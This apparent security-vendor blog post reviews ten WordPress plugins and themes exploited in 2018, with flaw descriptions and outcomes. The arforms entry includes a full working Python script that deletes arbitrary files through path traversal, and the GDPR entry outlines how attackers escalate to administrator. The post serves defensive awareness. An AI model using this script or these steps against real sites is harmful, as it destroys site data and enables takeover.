Introduction
This year a lot of plugins were launched which had a lot of innovative features like SEO optimization, a new editing interface and several newer ones which enhance the functionality of WordPress and help us to achieve more productivity via our work on WordPress. However many of these plugins have been exploited by hackers this year for malicious purposes like stealing credit card data, placing spam links on our page to redirect visitors to increase click-through rates and many more. We will discuss the top exploited WordPress plugins in 2018, what their vulnerability was and how it affected our websites.
Top Exploited WordPress Plugins
1) GDPR
Outcome: The vulnerability allows privilege escalation that is, it allows unauthenticated users to execute any action and to update any database value.
Issue:
Generally, there are a few actions being performed by the plugin which are submitted via WordPress’s admin-ajax.php functionality. Some of these include making requests to access data and/or delete them. Additional functionality includes changing the plugin’s settings from within the WordPress admin dashboard.
The earlier versions of WP GDPR Compliance plugin (<= 1.4.2) don’t perform a capability check when the internal action save_setting is to be executed in order to make configuration changes. A malicious user submitting arbitrary options and values can get those values stored and saved in the options table of the affected site’s database.
Attackers can now easily leverage this flaw to set the variable users_can_register option to 1. They now change the default_role of new users to the “administrator” profile and therefore fill out the visitor form at /wp-login.php?action=register to register as a privileged user. Now they can easily revert back any changes that they had made along the way and therefore install a new malicious plugin or theme containing a web shell or other malware to further infect the victim site.
Related Article – WordPress GDPR Compliance Plugin Exploit
2) AMP
Issue:
In the older version of the plugin, we can register ajax hooks which allows us to call functions directly on wp-admin/admin-ajax.php?action=action_name.
The plugin has a vulnerability which allows every registered user to call AJAX hooks regardless of being authorized to do so or not. So any user may call such functions.
The loophole in the AMP plugin is located in the ampforwp_save_steps_data which serves the purpose of saving all the settings during the install performed by its installation wizard. The AJAX hook corresponding to it is wp_ajax_ampforwp_save_installer.
Also, the wpnonce value is not even checked to ensure that a privileged user can access the accounts. Any visitor is allowed to change the account preferences directly.
Outcome:
Owing to the above vulnerability, Hackers can easily perform several malicious acts. They may place unwarranted ads, custom HTML text in header and footer and also since the user role is not validated, it is possible for anyone to place their ads, mining scripts or malware.
Related Article – Code Injection in WordPress AMP plugin
3) Duplicator
Outcome:
Remote Code Execution Vulnerability
Issue:
Duplicator helps to migrate the files from one system to another. So this loophole gets exploited when there are unsaved files after such a migration. In unpatched backups, the installer.php script introduces a vulnerability (of remote file injection) which occurs due to the failure to sanitize the database as per the configuration data submitted by the user. The values thus get directly written to the freshly generated wp-config.php file.
Therefore, new values are then defined for the strings to be replaced with.
Basically, these are the injection points. As soon as the POST parameter action_ajax=3 is supplied, the installer knows that the security restrictions on overwriting an existing wp-config.php file from the installer’s web interface have been bypassed.
The payload can be easily sent to an existing define()call in the config file like DB_HOST or DB_USER . Since a single quote can be passed, the attacker can add any of his malicious code to the disrupted site’s wp-config.php file. Now the attacker can easily establish backdoors and perform malicious activity.
Related Article – Outdated Duplicator Plugin vulnerable to RCE
4) Tag div theme
Issue:
A surprising revelation: Two websites were found to be added to the external scripts of about 2200+ sites. These 2 websites are dn.eeduelements.com and cdn.allyouwant.online. The main culprits are outdated tagDiv themes and Ultimate Member plugins to which the attackers add malicious code. That includes the src.eeduelements.com/get.php address to fetch a URL that contains a redirect script which ultimately leads the visitors to the fake sites.
Outcome:
Redirect to spam websites with fake links and captcha images.
Related Article – Tagdiv theme exploited
5) arforms
Issue:
arforms plugin(<=versions 3.5.1) suffers from an arbitrary file deletion problem.
#!/usr/bin/python
import requests
import sys
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Connection": "close"
}
print "n"
if(len(sys.argv)<3):
print "Please enter WP URL as first argument and file address that you want to delete as second onen
for example if WP is installed in the root directory of www.example.com and we want to delete index.phpn
the exploit format should be: python arforms.py www.example.com index.php"
exit()
r = requests.get(sys.argv[1]+sys.argv[2], headers=headers)
if(r.status_code==404):
print "The specified file doesn't exist on the host"
exit()
url = sys.argv[1]+'/wp-admin/admin-ajax.php'
payload = {
"action":"arf_delete_file",
"file_name":"../../../../"+sys.argv[2]
}
r = requests.post(url, data=payload, headers=headers)
if(r.status_code!=200):
print "The specified URL is not a wordpress installation or the plugin isn't installed"
else:
r = requests.get(sys.argv[1]+sys.argv[2], headers=headers)
if(r.status_code!=200):
print "Operation completed"
else:
print "The target isn't vulnerable"
Outcome:
Arbitrary File Deletion in Version: <=3.5.1
6) image-intense
Issue:
The Image Intense WordPress plugin allows authors to include images in posts and pages using the Divi builder. The plugin build only uses shortcodes that will be processed by Image Intense. However, when such a shortcode is processed, the src attribute is used without any sanitization and passed to get_image_url_by_size. Using an src attribute value which aims to alter the original query, it is possible to trigger the SQL injection when a user displays the post or page. Therefore, successful exploitation could get an attacker authenticated with a role allowing him to create posts or pages to extract records from the database and depending on the DBMS’s permission criteria, they can access other databases or the local filesystem.
Related Guide – WordPress Hack Removal
Outcome:
For Versions <= 3.2.5 – Authenticated SQL Injection in shortcodes
background-takeover (https://www.exploit-db.com/exploits/44417)
Allows for an attacker to browse files via the download.php file:
Such a vulnerability allows for Directory Traversal i.e. it enables an Attacker to traverse the different files via the dowload.php file.
7) gift-voucher
Issue:
The Plugin is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. This vulnerability allows an attacker to siphon off data from the plugin, accessing or illegally modifying the data and exploiting any other vulnerabilities in the underlying database. WordPress Plugin Gift Vouchers (Gift Cards and Gift Packages) version 1.0.5 is vulnerable; prior versions may also be affected.
Outcome:
The vulnerability allows an attacker to inject SQL commands on ‘template_id’ parameter. This issue is called Blind SQL injection .
8) buddyboss-media
Issue:
WordPress Plugin BuddyBoss Media is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. This vulnerability might be leveraged to execute arbitrary script code in the victim browser of an unsuspecting user on the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin BuddyBoss Media version 3.2.3 is vulnerable; prior versions may also be affected.
Outcome:
An attacker can execute arbitrary scripts on our website and therefore steal cookie-based authentication details.
9) userpro
Issue:
Unauthenticated Cross-Site Scripting (XSS) in versions 2.13 to 4.9.23. The UserPro plugin for WordPress CMS allows XSS via the shortcode parameter in a userpro_shortcode_template action to wp-admin/admin-ajax.php.
Outcome:
Allows Attackers to insert unauthenticated scripts in websites
10) dark-mode
Issue:
Stored XSS data can be accessed by Hackers i.e. they can steal their session data.
Outcome:
Attackers can steal data from cookies which can store information from the users’ machines.
Protection Against Zero-Day Attacks in WordPress
Developers today develop a large number of software applications every day. Some small, some complicated. Many such software releases contain bugs which the developers or users may not be aware of. As such, a patch to fix the bug would not be immediately available on its discovery. Such bugs are because if found by an attacker, they can exploit it and cause significant damage before the patch is released to repair the vulnerability.
This can be mitigated to a large extent by using a proper firewall (which can act as an additional layer of security), up-to-date patches and updates and using a proper intrusion detection system. Astra provides all of the above features along with a thorough security audit which is an extra line of defense for your website. Our engineers try to find all the flaws in your website so that the hackers won’t.
So secure your WordPress website today!
Rohan Roy
[…] Also, check Top 10 Exploited WordPress plugins in 2018 […]